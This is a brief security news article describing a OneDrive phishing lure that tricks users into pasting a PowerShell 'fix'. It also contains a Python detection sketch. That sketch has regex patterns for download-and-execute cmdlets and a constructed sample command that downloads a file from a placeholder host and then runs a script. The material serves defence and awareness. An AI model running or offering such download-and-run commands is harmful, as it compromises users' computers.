Cybersecurity experts have discovered a new phishing scam targeting Microsoft OneDrive users. This scam uses tricky social engineering tactics to get users to run a harmful PowerShell script on their computers.
How the Scam Works
- The Email: The scam starts with an email that contains an HTML file.
- Fake OneDrive Page: When you open the file, it shows a fake OneDrive page with an error message saying, "Failed to connect to the 'OneDrive' cloud service. To fix the error, you need to update the DNS cache manually."
- Two Options: The message offers two options: "How to fix" and "Details."
  - "Details" leads to a legitimate Microsoft page on DNS troubleshooting.
  - "How to fix" asks you to press "Windows Key + X" to open a menu, then launch PowerShell, and paste a command to fix the issue.
- Malicious Command: This command flushes the DNS cache, creates a folder on your C: drive, downloads a file, and runs a harmful script.
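
For defenders, the pasted command described above has a recognizable shape: a DNS flush chained with folder creation on C:, a download, and script execution. The following detection sketch is an added example, not code from the original article. It assumes the input is PowerShell command text (for instance from script block logging), and the cmdlet spellings it matches, the names `STAGES` and `verdict`, and the sample events are all assumptions constructed for illustration, since the article does not reproduce the actual command.

```python
import re

# Assumed spellings: the article names four behaviours but not the command,
# so common PowerShell/cmd forms of each behaviour are matched instead.
STAGES = {
    "dns_flush": re.compile(r"ipconfig(\.exe)?\s+/flushdns|Clear-DnsClientCache", re.I),
    "mkdir_c_root": re.compile(r"\b(New-Item|mkdir|md|ni)\b[^;|&]*\bC:\\", re.I),
    "download": re.compile(
        r"Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|DownloadFile|Start-BitsTransfer",
        re.I),
    "execute": re.compile(
        r"Start-Process|Invoke-Expression|\biex\b|&\s*['\"]?[A-Za-z]:\\", re.I),
}


def verdict(command):
    """Return (level, matched_stages) for one block of PowerShell text."""
    hits = {name for name, rx in STAGES.items() if rx.search(command)}
    # A DNS flush alone is routine. The lure stands out because the same
    # pasted "fix" also downloads and runs something.
    if {"dns_flush", "download", "execute"} <= hits:
        return "alert", sorted(hits)
    # DNS flush plus one other stage is worth an analyst's look.
    if "dns_flush" in hits and len(hits) > 1:
        return "review", sorted(hits)
    return "ok", sorted(hits)


# Constructed sample events (host, command text); not taken from the article.
SAMPLE_EVENTS = [
    ("ws-01", "ipconfig /flushdns"),
    ("ws-02",
     r"ipconfig /flushdns; New-Item -Path 'C:\constructed_dir' -ItemType Directory; "
     r"Invoke-WebRequest -Uri 'https://example.invalid/a.zip' "
     r"-OutFile 'C:\constructed_dir\a.zip'; "
     r"Start-Process 'C:\constructed_dir\run.cmd'"),
    ("ws-03",
     r"Invoke-WebRequest -Uri 'https://example.invalid/tool.msi' "
     r"-OutFile $env:TEMP\tool.msi"),
]

if __name__ == "__main__":
    for host, cmd in SAMPLE_EVENTS:
        level, stages = verdict(cmd)
        print(f"{host}: {level} {stages}")
```

Requiring the DNS flush together with the download and execution stages keeps ordinary troubleshooting and ordinary downloads out of the alert tier.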
Who Is Targeted?
This scam has been found targeting users in the U.S., South Korea, Germany, India, Ireland, Italy, Norway, and the U.K. It shows that phishing attacks are becoming more common and more sophisticated.
How This Scam Is Different
- Complex Instructions: This scam uses detailed instructions to trick users into running a harmful script, unlike simpler phishing attacks that just ask for your login information.
- Trusted Platforms: It uses legitimate-looking pages and trusted platforms like Microsoft OneDrive to fool users.